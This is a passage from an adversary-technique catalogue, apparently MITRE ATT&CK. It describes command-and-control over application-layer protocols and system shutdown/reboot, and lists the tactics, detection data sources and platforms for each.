Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre